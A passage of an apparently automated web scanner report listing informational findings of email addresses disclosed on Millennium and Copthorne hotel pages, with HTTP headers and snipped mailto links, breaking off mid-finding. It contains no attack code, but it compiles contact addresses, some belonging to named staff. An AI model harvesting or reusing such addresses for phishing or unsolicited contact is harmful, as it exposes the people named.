Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.362. http://www.millenniumhotels.com/millenniumboston/gallery/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/gallery/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:02 GMT
ETag: "33a8e-e3b2-921734dc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.363. http://www.millenniumhotels.com/millenniumboston/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 01 Feb 2011 14:13:16 GMT
ETag: "33c40-f7ff-223834b1"
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:25:51 GMT
Connection: close
Content-Length: 63487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.364. http://www.millenniumhotels.com/millenniumboston/meeting/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/meeting/index.html

Issue detail

The following email addresses were disclosed in the response:

ABaker@mill-usa.com
KEhrhardt@mill-usa.com
bostonian@mhrmail.com
tfreehoff@mill-usa.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:00 GMT
ETag: "33a92-fd77-3f1ec72f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...
<a href="mailto:KEhrhardt@mill-usa.com" title="KEhrhardt@mill-usa.com"
class="boldlink">KEhrhardt@mill-usa.com</a>
...[SNIP]...
<a class="boldlink" href="mailto:ABaker@mill-usa.com">ABaker@mill-usa.com</a>
...[SNIP]...
<a href="mailto:tfreehoff@mill-usa.com" class="boldlink">tfreehoff@mill-usa.com</a>
...[SNIP]...

21.365. http://www.millenniumhotels.com/millenniumboston/news/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/news/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:00 GMT
ETag: "2a084-ea1a-3f194b60"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.366. http://www.millenniumhotels.com/millenniumboston/restaurant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/restaurant/

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:13:06 GMT
ETag: "3398e-ff86-e52fd248"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.367. http://www.millenniumhotels.com/millenniumboston/restaurant/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/restaurant/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:00 GMT
ETag: "3398d-ff86-91f7bc38"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.368. http://www.millenniumhotels.com/millenniumboston/rooms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/rooms/

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:58 GMT
ETag: "3398d-e355-3efed479"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.369. http://www.millenniumhotels.com/millenniumboston/rooms/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/rooms/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:13:06 GMT
ETag: "33fac-e355-e5317d87"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.370. http://www.millenniumhotels.com/millenniumboston/rooms/suite.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/rooms/suite.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:58 GMT
ETag: "33fac-e393-3efd293a"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.371. http://www.millenniumhotels.com/millenniumboston/specials/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/specials/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:58 GMT
ETag: "2b5de-ea4a-3ef9d2bc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.372. http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/specials/specials_0005.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:57 GMT
ETag: "33fae-e45a-3ef6b947"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.373. http://www.millenniumhotels.com/millenniumboulder/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboulder/index.html

Issue detail

The following email address was disclosed in the response:

boulder@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:56 GMT
ETag: "3411b-fd7b-91be09b6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="boulder@mhrmail.com" target="_self" href="mailto:boulder@mhrmail.com">
...[SNIP]...

21.374. http://www.millenniumhotels.com/millenniumbuffalo/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumbuffalo/index.html

Issue detail

The following email address was disclosed in the response:

buffalores@mill-usa.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:50 GMT
ETag: "34229-f803-3e853c8b"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="buffalores@mill-usa.com" target="_self" href="mailto:buffalores@mill-usa.com">
...[SNIP]...

21.375. http://www.millenniumhotels.com/millenniumchicago/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumchicago/index.html

Issue detail

The following email address was disclosed in the response:

KnickerbockerSales@mill-usa.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:12:53 GMT
ETag: "34269-fae7-e465a478"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="KnickerbockerSales@mill-usa.com" target="_self"
href="mailto:KnickerbockerSales@mill-usa.com">
...[SNIP]...

21.376. http://www.millenniumhotels.com/millenniumcincinnati/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumcincinnati/index.html

Issue detail

The following email address was disclosed in the response:

cinti@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:41 GMT
ETag: "34298-f718-90d1c3df"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="cinti@mhrmail.com" target="_self" href="mailto:cinti@mhrmail.com">
...[SNIP]...

21.377. http://www.millenniumhotels.com/millenniumdurham/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumdurham/index.html

Issue detail

The following email address was disclosed in the response:

durham@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:36 GMT
ETag: "2c1c3-102aa-9081e518"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="durham@mhrmail.com" target="_self" href="mailto:durham@mhrmail.com">
...[SNIP]...

21.378. http://www.millenniumhotels.com/millenniumlosangeles/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumlosangeles/index.html

Issue detail

The following email address was disclosed in the response:

biltmore@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:12:37 GMT
ETag: "34b91-fcd7-e369a24f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:biltmore@mhrmail.com" target="_self" title="biltmore@mhrmail.com">
...[SNIP]...

21.379. http://www.millenniumhotels.com/millenniumminneapolis/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumminneapolis/index.html

Issue detail

The following email address was disclosed in the response:

mpls@mhrmail.com

Request

Response

21.380. http://www.millenniumhotels.com/millenniumnashville/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumnashville/index.html

Issue detail

The following email address was disclosed in the response:

maxwell@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:17 GMT
ETag: "127f0-fddc-3c864e34"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:maxwell@mhrmail.com" target="_self" title="maxwell@mhrmail.com">
...[SNIP]...

21.381. http://www.millenniumhotels.com/millenniumnewyork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumnewyork/index.html

Issue detail

The following email address was disclosed in the response:

mbreservations@mill-usa.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:13 GMT
ETag: "13bb1-f653-8f277903"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="mbreservations@mill-usa.com" target="_self"
href="mailto:mbreservations@mill-usa.com">
...[SNIP]...

21.382. http://www.millenniumhotels.com/millenniumscottsdale/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumscottsdale/index.html

Issue detail

The following email address was disclosed in the response:

mccormick@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:02 GMT
ETag: "3548d-fcad-8e7fdd4c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="mccormick@mhrmail.com" target="_self" href="mailto:mccormick@mhrmail.com">
...[SNIP]...

21.383. http://www.millenniumhotels.com/millenniumstlouis/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumstlouis/index.html

Issue detail

The following email addresses were disclosed in the response:

hr-stl@mill-usa.com
stlouis@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:11:53 GMT
ETag: "20d5c-103b2-8df87154"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:stlouis@mhrmail.com" target="_self" title="stlouis@mhrmail.com">
...[SNIP]...
<a href="mailto:hr-stl@mill-usa.com" class="boldlink">hr-stl@mill-usa.com</a>
...[SNIP]...

21.384. http://www.millenniumhotels.com/millenniumunplazanewyork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumunplazanewyork/index.html

Issue detail

The following email address was disclosed in the response:

unres1@mill-usa.com

Request

Response

21.385. http://www.millenniumhotels.com/my/copthornepenang/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/my/copthornepenang/index.html

Issue detail

The following email address was disclosed in the response:

rsvn@copthorne.com.my

Request

Response

21.386. http://www.millenniumhotels.com/opening/millenniumveetaichung.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/opening/millenniumveetaichung.html

Issue detail

The following email address was disclosed in the response:

freda.zhang@grandmillenniumbeijing.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:10:57 GMT
ETag: "34d1b-f87b-37ce3d11"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<a
href="mailto:freda.zhang@grandmillenniumbeijing.com">freda.zhang@grandmillenniumbeijing.com</a>
...[SNIP]...

21.387. http://www.millenniumhotels.com/ph/heritagemanila/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ph/heritagemanila/index.html

Issue detail

The following email address was disclosed in the response:

inquiry@heritagehotelmanila.com

Request

Response

21.388. http://www.millenniumhotels.com/premierhotelnewyork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/premierhotelnewyork/index.html

Issue detail

The following email address was disclosed in the response:

premierconcierge@mill-usa.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:10:34 GMT
ETag: "35249-f93b-893ef1fb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:premierconcierge@mill-usa.com" target="_self"
title="premierconcierge@mill-usa.com">
...[SNIP]...

21.389. http://www.millenniumhotels.com/qa/millenniumdoha/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/qa/millenniumdoha/index.html

Issue detail

The following email addresses were disclosed in the response:

reservations@mill-doha.com
reservations@millennium-doha.com
sales@mill-doha.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:42:56 GMT
ETag: "22741-c836-fd09c093"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="reservations@millennium-doha.com" target="_self"
href="mailto:reservations@mill-doha.com">reservations@mill-doha.com</a>
...[SNIP]...
<a title="blocked::mailto:sales@mill-doha.com"
href="mailto:sales@mill-doha.com">sales@mill-doha.com</a>
...[SNIP]...

21.390. http://www.millenniumhotels.com.cn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.cn
Path:	/

Issue detail

The following email address was disclosed in the response:

MC.coordinator@grandmillenniumbeijing.com

Request

GET / HTTP/1.1
Host: www.millenniumhotels.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:09:20 GMT
ETag: "14c79-e533-84d3a62a"
Accept-Ranges: bytes
Content-Length: 58675
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hans" lan
...[SNIP]...
<a href="mailto:MC.coordinator@grandmillenniumbeijing.com?subject=...............">
...[SNIP]...

21.391. http://www.millenniumhotels.com.sg/StudioMHotel/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/StudioMHotel/index.html

Issue detail

The following email address was disclosed in the response:

reservations@studiomhotel.com

Request

GET /StudioMHotel/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:17:18 GMT
ETag: "2102a-e497-4e848d6c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="reservations@studiomhotel.com" target="_self"
href="mailto:reservations@studiomhotel.com">
...[SNIP]...

21.392. http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/copthornekingssingapore/index.html

Issue detail

The following email address was disclosed in the response:

rooms@copthornekings.com.sg

Request

GET /copthornekingssingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:34 GMT
ETag: "132f8-e78d-a246ebe0"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:rooms@copthornekings.com.sg" target="_self"
title="rooms@copthornekings.com.sg">
...[SNIP]...

21.393. http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/copthorneorchidsingapore/index.html

Issue detail

The following email address was disclosed in the response:

rsvn@copthorneorchid.com.sg

Request

GET /copthorneorchidsingapore/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:26 GMT
ETag: "15ba4-e507-a1cd90fb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="rsvn@copthorneorchid.com.sg" target="_self"
href="mailto:rsvn@copthorneorchid.com.sg">
...[SNIP]...

21.394. http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com.sg
Path:	/grandcopthornewaterfront/index.html

Issue detail

The following email address was disclosed in the response:

enquiry@grandcopthorne.com.sg

Request

GET /grandcopthornewaterfront/index.html HTTP/1.1
Host: www.millenniumhotels.com.sg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:17:17 GMT
ETag: "184d6-e733-a149f593"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:enquiry@grandcopthorne.com.sg" target="_self"
